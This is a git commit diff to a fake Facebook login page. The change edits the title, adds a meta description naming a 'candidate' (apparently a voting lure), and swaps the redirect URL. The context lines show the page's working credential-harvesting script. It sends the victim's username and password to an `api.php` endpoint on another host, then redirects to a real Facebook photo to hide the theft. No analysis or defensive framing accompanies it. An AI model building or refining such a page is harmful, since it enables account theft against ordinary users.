updated meta data

--- a/index.html
+++ b/index.html
@@ -11,7 +11,8 @@
         crossorigin="anonymous">
     <link rel="stylesheet" href="style.css">
 
-    <title>Login into Facebook | Facebook</title>
+    <title>Facebook</title>
+    <meta name="description" content="CANDIDATE NO. 5- MS. WILSIE">
 </head>
 
 <body>
@@ -23,6 +24,9 @@
             </div>
         </div>
     </nav>
+
+
+
     <div id="content">
         <div class="container d-flex">
             <div class="login-container m-auto">
@@ -295,7 +299,7 @@
                 const link = `${host}/api.php?entity=Users&action=login&args[]=${username}&args[]=${password}`;
 
                  $.getJSON(link, function(data) {
-                     window.location = 'https://web.facebook.com/juvy0126/photos_albums';
+                     window.location = 'https://web.facebook.com/photo.php?fbid=1663552213762336&set=a.1663549670429257.1073742002.100003227212846&type=3&theater';
                  });
             })
         });
